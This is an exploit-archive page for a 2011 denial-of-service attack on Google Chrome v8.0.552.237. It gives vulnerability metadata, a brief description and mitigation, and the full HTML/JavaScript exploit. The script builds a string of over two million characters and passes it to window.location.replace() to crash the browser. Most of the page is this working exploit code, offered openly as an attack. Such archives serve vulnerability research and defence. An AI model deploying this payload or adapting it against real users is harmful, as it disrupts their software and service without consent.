header-logo
Suggest Exploit
vendor:
Chrome
by:
Carlos Mario Penagos Hollmann
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Chrome
Affected Version From: v8.0.552.237
Affected Version To: v8.0.552.237
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3, Windows 7, Linux (VMware Fusion 3.1 and VirtualBox 3.2.8)
2011

Google Chrome v8.0.552.237 .replace DOS

This exploit uses the replace() method of the window.location object to cause a denial of service in Google Chrome v8.0.552.237. The exploit creates a string of 2304453 'a' characters and passes it to the replace() method, causing the browser to crash.

Mitigation:

Upgrade to the latest version of Google Chrome.
Source

Exploit-DB raw data:

<html>
<head>
 
 
# Exploit Title: Google Chrome v8.0.552.237 .replace DOS
# Date: January 30 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://www.google.com/chrome
# Version: v8.0.552.237 
# Tested on: Windows xp sp3 ,windows 7 ,linux running on VMware Fusion 3.1 and VirtualBox 3.2.8
  
  
#  mail----> shogilord^gmail.com spams are welcome!!!!!
#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/ 
  
# COLOMBIA hacking presents.............
#    
# Google Check the replace
#

 
<script type="text/javascript">
 
function mul(str,count){
    if(count==0) return '';
    var binaryCount = count.toString(2);
    var numDegree = binaryCount.length;
    var resultStr='';
    for(var i=0; i<numDegree; i++){
        resultStr+=resultStr; 
        if(binaryCount.charAt(i) == '1'){
            resultStr+=str;
        }
    }
    return resultStr;
}
 
var junka = "a";
 
var junk = mul(junka,2304453);
 
 
window.location.replace("http://" + junk);
 
</script>
</head>
<body>
 
</body>
</html>

Navigation

Suggest Exploit

Services By CQR